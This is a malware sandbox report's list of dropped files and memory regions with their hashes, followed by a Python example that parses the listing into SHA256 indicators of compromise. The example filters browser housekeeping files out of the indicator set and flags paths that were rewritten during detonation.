SHA1 9859911ac8642ddf18e681d5f5228fb91a98912b
SHA256 c91c392a06ead881a96e607728d25c33704365d2481c0eb66750ef57896850a0
SHA512 419181bf50bb201c038fa3a99e643e6a7be1757abc6aa956757fb65406f0818b24ce10b223bed8e53af3218eee6b015711170d704364b43bae013fd2a4255916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 98afec5c3738dfa0f8f0712dd55eea14
SHA1 6137b42b941ab19ef03023a2856a1146b9a61ca8
SHA256 fdecfb79297f5f3c495824fac61a09e39e550f8b86a50c256b5d924c1a04634d
SHA512 26506c72a58d84e88bd2c52918c5fea1f143583bde1f03ad231055a38574478c943285bc7d30189a904513ccf409bd7043078f772a2c30b4137a1356c4c27cf8

memory/1744-1229-0x000001A6467A0000-0x000001A6477A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2333e4cf4eed0360e1e4892447a9c7bd
SHA1 d4b2a4ec0281c9b78a209dbadfd5b516d0427a2c
SHA256 1ec3a78976d56ee79862b03c14437f0acb0e956974bf03ce6ea36279126f94dc
SHA512 06e389354e7a3e8d24a8d400c2508b38433d2ddde2345cfa905ff669070d594ed6c94fecab17d844f2eeade42403b9d307b37b0668d9025e2ceaa3269b3812e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 270d6f0e87b73d1090e1f7e5151f12ee
SHA1 5f33a31c2a9b21ad3abeba759d77671c7f8d3081
SHA256 1ac60b7e9b32e85e51d477f26a328ed6d997a44cb86f05010398c2f03de5d90f
SHA512 6ca8b8f09743784cb33203a51b5c786bf3ca772992c9aca1add3084423f2021c9fa33f10adc62fbfde39dcb48d1dbd7aa1acd8a761ec6365fc3da467594ec966

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c22b8fdb9d69a17c492f51d4822f3b67
SHA1 d6f33387d754ff4f974c8d6b1a033844c5a1f4da
SHA256 7eb24fe024a49849f5e4550c6e74ba681cce730c19c3146160f54e1c5ded3a5d
SHA512 22201d74d5b1fe54eb4218f08cad21d277ad67ffe8f4ee13f840156fb93ca40b1d7065d4ce6b1a8a7e6f47845537517eb753011e957013fc57517bd04564dc80

memory/3628-3308-0x0000000005D30000-0x0000000005DC2000-memory.dmp

memory/3628-3313-0x0000000005E30000-0x0000000005E3A000-memory.dmp

memory/3628-3374-0x000000000BCC0000-0x000000000C3A0000-memory.dmp

memory/5736-3412-0x0000000000D70000-0x0000000002397000-memory.dmp

C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

MD5 6bb0ab3bcd076a01605f291b23ac11ba
SHA1 c486e244a5458cb759b35c12b342a33230b19cdf
SHA256 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512 d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

memory/5736-3466-0x0000000000D70000-0x0000000002397000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 38dc18b20cb8e19ff84b8437eb259e18
SHA1 3ffe09cffac3b9d35cc6d4dc6910b0a91dea1f4e
SHA256 cf1987132e6abec1d4b5c662070217ef14ae1008fa69dcb274c1abfb2bf0cce8
SHA512 bca30f4fd17e4b6ddbe7644ca59422643cf87695402e04c7f07d85ee5632fa20d5c0660ba6af309ca9033c4855ad13a8d6305a11eb1e25d93cc9b9dbdad75456

memory/5720-3481-0x00000000000D0000-0x00000000003F4000-memory.dmp

memory/6424-3483-0x0000000002480000-0x00000000024A4000-memory.dmp

memory/6424-3482-0x00000000002E0000-0x000000000036A000-memory.dmp

memory/6596-3492-0x000000001C410000-0x000000001C460000-memory.dmp

memory/6596-3493-0x000000001C520000-0x000000001C5D2000-memory.dmp

memory/6924-3509-0x0000016F9FBF0000-0x0000016F9FC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k4e4yv0.jls.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 3a1707a75029a7d714539d6d57db7fe3
SHA1 0b6db8bdb9d7999473ffe9f2b694bf32e47aeaa3
SHA256 abb28f7e97d903c18fb6b5522a57dcc4a3fb8d4c3d568dd747706c7dd3bc5a00
SHA512 09cbb5e3e4fb82b61c2d153403e8c209b7f109f19fbbcaafb1bb592924333b5dcba4db393f3c996a78136fe31d66f139b77e9ea32d624890aae6f55cf8bc3073

memory/6924-3578-0x0000016F9FF20000-0x0000016F9FF2C000-memory.dmp

memory/6924-3579-0x0000016F9FF50000-0x0000016F9FFAC000-memory.dmp

memory/6700-3581-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\Pictures\l6lGezRTHj8HnL5T9Jiqd1RF.exe

MD5 588ec1603a527f59a9ecef1204568bf8
SHA1 5e81d422cda0defb546bbbdaef8751c767df0f29
SHA256 ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16
SHA512 969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821

memory/2216-3604-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 06f13f50c4580846567a644eb03a11f2
SHA1 39ee712b6dfc5a29a9c641d92c7467a2c4445984
SHA256 0636e8f9816b17d7cff26ef5d280ce1c1aae992cda8165c6f4574029258a08a9
SHA512 f5166a295bb0960e59c176eefa89c341563fdf0eec23a45576e0ee5bf7e8271cc35eb9dd56b11d9c0bbe789f2eac112643108c46be3341fa332cfcf39b4a90b9

memory/4092-3619-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1612-3632-0x0000000000BA0000-0x0000000000BAA000-memory.dmp

memory/1612-3641-0x0000000002DD0000-0x0000000002DDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

MD5 9694195bfd2d5a2d219c548d8dc65cf0
SHA1 d1113d97bb1114025e9260e898f3a3048a5a6fda
SHA256 c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e
SHA512 24bb0f6432b221fe621d81a1c730bd473e9c295aa66a2b50cbe670ad2260f942a915f7f9aef65e6dc28320b8208fc712d9bfdc43dbc1a607ed9393bb5c17051a

memory/6872-3645-0x00000210F5B00000-0x00000210F5B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

MD5 ad8378c96a922dcfe813935d1eec9ae4
SHA1 0e7ee31880298190258f5282f6cc2797fccdc134
SHA256 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98
SHA512 d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f

memory/2216-3689-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 de94da9f218e18936aee6923c483ec3c
SHA1 d318589bd595e7a1b6a8106e88f62ac2dc6870bc
SHA256 2abf7d7032d6d940ed1cdd0a2b312b4fd0a5f1e2c5181174c3f8df21605e0671
SHA512 ccc2fa1abd53384e0888077f4eec4539bd27bb179244d6e033b4857c30fa61a598776352970f00dd06d64fbf8b9e3823341abdb0cda6f4de7b4281a474c5f238

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8cb9cdb1a0aec7a26ee723b6c3174342
SHA1 353507cb03e4491ad8c2dce16e4cd65bbcb6097c
SHA256 6151c8640f23b0b66c005a179cfbd983a1db47e9f6b025b589695223d4a37e6f
SHA512 7d7db664ac2e858465be26d9d50d9f986073777d75a5b42def466dcfcf55ec75d885f2576347e2c0d5621924867d3f648e4c11086efb2a4d41d239793dca09f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 94185dcdbe0dcb09cbd067f6b8354797
SHA1 d79a8feb340e5f88c1a7af2c2132dfc8b38e64b4
SHA256 748216e0f767f83c80798867c992d755e68424d75ec66dcd9a56cab8bce410ca
SHA512 f43bcd527909a78d75bd95000862d30775dcde3820c137fdaf58ecd39238ff33aac05575e999a3b4727ec7dcd33596d343c7bf749779a791238d38c0d4b3bbd0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 fc515bfc60adba798695e516dbf80ef1
SHA1 6dc4722092af19a95e4d5a7b64dca9afc2ad30ad
SHA256 869b6e72ce52552fd50b7144ae06a81c389273f76f92cd08c1475514f516433d
SHA512 588d583a1ed21f03be83ca339eafa4339aca22b0c3bfe0ad9fbe44bec6ae20c0e82210f07476926ae29cfb24ad7ca482e9e7282a99c67efe80dc7bd0762abdc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 012c8fb85ef425d969add6fe54956ee1
SHA1 bf8c6c22bb5cea896677e2a6122b23c7621a8b40
SHA256 e700633039dbf7ced1b0e9d5aac030326597c46185589b1fd7108c851dd4f3e6
SHA512 3331f6ca572e2439398070ddc26498aeb00c282d29ee584db0659ab4c482965e2d07ab5fcd2f9228bcc58f0bbce2ee70d3a36a3002cf70fde6c010af4a0b14a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b880b2918099acb956d03f5639082e85
SHA1 8bd0d345a73f3a8ba6cc581213fff13dad197e14
SHA256 da6abdb948d5fabd29a6322ba79e37dc0f720b4a7794cc0c86b05db20d236108
SHA512 cb7548b4d717c77b68e71bd393dc8a16d6f362cabb3e5c48cae88987dc681e555a2703e6c02f313b33dc61256d28d71cb4af4ca8c85fd2baa14e5dc6f6eab28f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 452c0a6a8d36fcf032ac9cd058742275
SHA1 b301b125f82b3089b6daa9b8fc44356cc4ca582f
SHA256 154355b51edc5b84a9868120520494759e10b3831dec20235f541829d89dac4c
SHA512 6bc02baf11af203867a590ec47ea02c4ef787648229ec80305f605bf29b65e33e6672b8d1c7b025049231a1ddd8353ba6ad22b9ddebed3b99d081ccc5ae0d89a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45607a0ea7364556bb3b7a9ab8818f25
SHA1 74b42a95efedfdf83dced49d9f8a786a2585efc3
SHA256 49bc7778e156d634b4ff2b6e95bcd03942e565645a39e5d2736be7b453b95daa
SHA512 6b76cbb6ac171e99e8e5b8a15c4cc7aa9c22a517c2e7e459e25614b9f0401dd952a235b6006131273908743717466c1b29740d3f10e52be98677e1fbf8410c53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 311cf6edb71cc2358054f0d3497e99ad
SHA1 29c385e7be7b73221b1326b5fc37df298869bd8c
SHA256 a3865ec0575be3883a1cea9d041ccb78fe7cccc9cae2711f2016a438030cf50f
SHA512 fa5ef698d1b3eee17c74ce7f00ad90f36ea50362e40926c6c4f6ca1719585cd6d77bbe5347f1f47150b3c8ee4348f9711cf52cc54337ea534a4df016331629a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4ad0590f28cead0eec1a579bb9bfae93
SHA1 a567c1bc58e9c81a1715afe776acb6b366659b96
SHA256 27d39d9553a2693f8c96a03fb446b22dcf527df7abf518548aff36258caf0f06
SHA512 e03b9e7e4b74337370b2f90d75d6e31bbc01c88d7e9cf92fab042c8add66c0b63f2a613f67f37e044ecbb521785e3fe30814b6e2264d93caa397744b6fcc4f14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a0353f32b160563acb1180333297dbb
SHA1 ebd3e70cadd0cfff78db79e047ff33b9a69662f3
SHA256 e5771b33d3f3c49cde150d20722dfba1a16217279ad37a60517afd0a0d19f2bd
SHA512 41fabcd74409152f5b7a0f8c738a23596cac5022cc3773dc2955e8e7f316c6df1b7b221d630bd72f69c594dd911646a727948cf2d01a6e08e3166d4d3a61f683

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2a444e363dbc5abd014873bdd56ee4d6
SHA1 fd8535d3abdc749ece96eb41e61cfea09492ec5b
SHA256 dbca54d8fd7e8536c51e292d0c5c86f229e5a79dd2d32c3ae75b2ffc009d4eec
SHA512 268f658b91eddc998d4b3b3ae204d9ae34bd115f441569cc510f1ff09f81acb2da4c57f9de9f85168da053fa76abef31cbcb27479e9c141290ed933715ed4d90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bc6b17810062a00aa5423831f7c2d5e7
SHA1 dd1a19da6d3fae5b2f33f80ce2ed933c593faa0f
SHA256 b2a10d0a0f95fc126c42bb4b4627283934d3e8b37eb8746e72d3f2e5d695e0dd
SHA512 ba51faeab4bb0fb6f02e3cfdeb72683066fe1262e89f4b79e895ee78c8642c8f4cd774990f4b147f4dd1b71b9fa1db5cbcb9c4271df1f81bfac64029e4756b47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 420aeac16f39ea0f50bb4fedffdc8bdd
SHA1 d703375e127c02bb57ea5c73758e53b440eff01c
SHA256 19c4aa5823cdb68cc8f63208f0e03ade76078b6738c14e0aaa265428526699f7
SHA512 6971925b03831118e889304e200e74090f4108040efe9d594a2bdb6c50a34413cb233110ae1a6c316191aa0fc8c9102ab6aba879fb6ccd7cf75594c571cad52e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 dce17b09e6e3fe92e5a1f753e57a4fbe
SHA1 77777e206f6aca53962ab094d0f724a0901d1fd6
SHA256 42edd602da277c06b7e40e235b45e0db988812c2be86f18f58a7f3d9dae698b0
SHA512 43723f058eb2b7b8cffff1b613b185bacee93d1936fb034613d2e15be598d1058d6ba8469fc5c7ec52b846586c69b51317c6916b468709935b08286422e6d08b
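A parser for this listing format, added here as an example that is not part of the sandbox report. It reads the path / MD5 / SHA1 / SHA256 / SHA512 blocks and the `memory/<pid>-<index>-<start>-<end>-memory.dmp` lines above into records, rejects digests of the wrong length, drops Edge profile housekeeping files from the SHA256 IOC set, flags paths that appear more than once with different content, and checks a blob against the resulting set. The embedded sample is copied from entries in the listing above plus one constructed malformed entry (`bogus.exe`); the noise-prefix list, record types and function names are this example's own choices, not the report's.

```python
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Line shapes used by the sandbox "Files" listing above.
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Edge profile files rewritten on every browser start, excluded from the IOC set.
# The prefix list is this example's assumption, not something the report states.
NOISE_PREFIXES = ("c:/users/admin/appdata/local/microsoft/edge/user data/",)

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)  # algorithm -> lowercase hex digest

@dataclass
class MemoryRegion:
    pid: int    # process the region was dumped from
    seq: int    # sandbox's sequence number for the dump
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start

def parse_listing(text: str):
    """Return (files, memory_regions, errors) for text in the listing format above."""
    files, regions, errors = [], [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                errors.append(f"hash line with no preceding path: {line}")
            elif len(digest) != HASH_LEN[algo]:
                errors.append(f"{current.path}: {algo} is {len(digest)} hex chars, expected {HASH_LEN[algo]}")
            else:
                current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)  # any other non-blank line starts a file entry
        files.append(current)
    return files, regions, errors

def is_noise(path: str) -> bool:
    return path.lower().replace("\\", "/").startswith(NOISE_PREFIXES)

def sha256_iocs(files):
    """Unique SHA256 values of dropped files, noise paths excluded, sorted."""
    return sorted({f.hashes["SHA256"] for f in files if "SHA256" in f.hashes and not is_noise(f.path)})

def rewritten_paths(files):
    """Paths listed more than once with different content: {path: distinct SHA256 count}."""
    seen = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            seen[f.path].add(f.hashes["SHA256"])
    return {p: len(h) for p, h in seen.items() if len(h) > 1}

def digest_matches(data: bytes, ioc_sha256) -> bool:
    """True when the SHA256 of `data` (a suspect file's bytes) is in the IOC set."""
    return hashlib.sha256(data).hexdigest() in ioc_sha256

# Entries copied from the listing above (SHA1/SHA512 kept for the first only; the blank
# separator lines, which the parser skips, are omitted), plus one constructed entry,
# bogus.exe, whose SHA256 is too short, to exercise the validation path.
SAMPLE_LISTING = r"""C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe
MD5 7ecfc8cd7455dd9998f7dad88f2a8a9d
SHA1 1751d9389adb1e7187afa4938a3559e58739dce6
SHA256 2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512 cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
memory/3628-232-0x0000000005EA0000-0x00000000063F0000-memory.dmp
memory/3628-233-0x00000000069A0000-0x0000000006EEE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
MD5 96f833516ff06c9badd5f3f13a6bcec2
SHA256 49cb5d929a0f91a18c5320b2cbbafa4e2509ad18f7e50c321a8937c431ee8124
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
MD5 98afec5c3738dfa0f8f0712dd55eea14
SHA256 fdecfb79297f5f3c495824fac61a09e39e550f8b86a50c256b5d924c1a04634d
memory/5736-3412-0x0000000000D70000-0x0000000002397000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
MD5 9694195bfd2d5a2d219c548d8dc65cf0
SHA256 c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e
C:\Users\Admin\AppData\Local\Temp\bogus.exe
SHA256 deadbeef
"""
```

Match on SHA256 only; the MD5 and SHA1 values are listed for lookup against older feeds, not as identity. Keeping the Edge profile files out of the IOC set is a triage choice, not a statement that they are irrelevant: the same path appearing with several hashes (Preferences, Local State, TransportSecurity above) shows the browser was started and its state rewritten during detonation, which is worth correlating with the .url and .htm files in the listing. `__PSScriptPolicyTest_*.ps1` in Temp is written by PowerShell itself when it probes AppLocker/WDAC script policy and is another candidate for the noise list.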